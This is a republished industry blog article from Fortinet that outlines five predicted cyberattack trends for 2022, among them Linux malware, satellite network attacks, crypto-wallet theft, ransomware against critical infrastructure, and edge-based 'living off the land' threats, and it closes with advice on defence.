Five Concerning Cyberattacks to Watch Out for in 2022

  /  ICS Security   /  Cybersecurity   /  Five Concerning Cyberattacks to Watch Out for in 2022
cyberattacks

Five Concerning Cyberattacks to Watch Out for in 2022

In 2022, threats are unlikely to slow down. In fact, our experts predicted cyberattacks will increase in 2022. This is unfortunate news especially as the attack surface continues to expand.

For organizations struggling to integrate and manage a collection of single-purpose products, the resulting complexity and lack of visibility is likely to leave these organizations at risk. They must work to resolve these security gaps as quickly as possible – but they need to know where to focus.

Five Types of Cyberattacks to Look Out For in 2022

To set the stage for the 2022 threat environment, let’s take a look at some of the most noteworthy cybersecurity statistics from 2021.

Despite many organizations putting their best foot forward to protect their networks, they still face risks. Minimizing this risk will require them to start preparing for emerging cyberthreats today. And while no one can predict the future, here are five up-and-coming threats we’re keeping an eye on at FortiGuard Labs.

1. Linux Attacks

Up until recently, Linux has been largely ignored by cybercriminals, but that’s changing. Because Linux runs the back-end systems of many networks and container-based solutions for IoT devices and mission-critical applications, it’s becoming a more popular target for attackers. At this point, attacks against Linux operating systems and applications running on those systems are as prevalent as attacks on Windows operating systems.

Many organizations are used to defending against Windows attacks but aren’t accustomed to keeping up with Linux from a defensive and malware analysis standpoint in comparison to Windows. Even worse, Linux environments often have valuable data like Secure Socket Shell (SSH) credentials, certificates, applications usernames, and passwords.

A malicious implementation of the Beacon feature of Cobalt Strike called Vermilion Strike can target Linux systems with remote access capabilities without being detected. Now that Microsoft is actively integrating Windows Subsystem for Linux (WSL) into Windows 11, it’s inevitable that malware will follow. WSL is a compatibility layer that is used for running Linux binary executables natively on Windows. An increase in botnet malware is being written for Linux platforms as well. The recent Log4J vulnerability is also a good example of a recent attack where we are seeing Linux binaries capitalize on the opportunity.

2. Satellite Network Attacks

As connectivity using satellite internet increases, the likelihood of new exploits targeting these networks will increase correspondingly. At this point, about a half dozen major satellite internet providers are already in place. The biggest targets will be organizations that rely on satellite-based connectivity to support low-latency activities, like online gaming or delivering critical services to remote locations, as well as remote field offices, pipelines, or cruises and airlines. This will also expand the potential attack surface as organizations add satellite networks to connect previously off-grid systems, such as remote OT devices, to their interconnected networks.

3. Cyberattacks Targeting Crypto Wallets

In an increasingly digitized world, crypto wallets are a new risk as more malware designed to target stored information means attackers can steal credentials such as a bitcoin private key, bitcoin address, crypto wallet address, and other significant information. They then can drain the digital wallet. Attacks often start as a phishing campaign that uses the classic strategy of attaching a malicious Microsoft Word document to a spam email. The malware is delivered by a Word document macro that is designed to steal crypto wallet information and credentials from the victims’ infected devices.

Along the same lines, a new fake Amazon gift card generator targets digital wallets by replacing the victim’s wallet with that of the attacker. And a new remote access trojan (RAT) called ElectroRAT targets cryptocurrency. It combines social engineering with custom cryptocurrency applications and has the ability to perform keylogging, take screenshots, upload and download files, and execute commands.

4. Ransom Attacks on OT Systems

Ransomware attacks are increasingly targeting critical infrastructure and the phrase “killware” has been used to describe some of these incidents. Although the attacks don’t necessarily target human lives directly, the term is used because the malware that disrupts hospitals, pipelines, water treatment plants, and other critical infrastructure is different from regular exploits because of the direct impact they can have on people.

Cybercriminals may be moving away from smaller targets toward larger more public attacks that affect the physical world, including supply chains and a large number of human victims. The near-universal convergence of IT and OT networks has made it easier for attackers to access OT systems through compromised home networks and devices of remote workers. Adding to the risk is the fact that attackers no longer have to have specialized technical knowledge of ICS and SCADA systems because now they can buy attack kits on the dark web.

5. Attacks on the Edge

The increase in the number of people working remotely has exposed corporate networks to many of the threats to residential networks. The increase in network edges means there are more places for “living off the land”-type threats to hide. With this technique, attackers use malware made from existing toolsets and capabilities within compromised environments so their attacks and data exfiltration look like normal system activity. Living off the land attacks also may be combined with edge access trojans (EATs), so new attacks will live off the edge, not just the land. While avoiding detection, the malware located in these edge environments can use local resources to keep an eye on activities and data at the edge and then steal, hijack, or even ransom critical systems, applications, and information.

Conclusion: Organization Must Protect Against Threats New and Old

To prepare for 2022, organizations should certainly make it a priority to harden both Linux and Windows-based systems. And when adopting new technology, organizations should always take a security-first approach; in other words, before adding new connections such as satellite-based connectivity, make sure it’s protected.

But you must also keep in mind the fact that cybercriminals will continue using tactics as long as they keep working. Along with preparing for new threats, you can’t forget about what’s already out there. Defending against both new and existing threats requires an integrated approach to security. To fight today’s evolving threats, organizations should look into a security platform based on a cybersecurity mesh architecture with security solutions that are designed to work together.

Originally this article was published here and it was written by Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, Fortinet.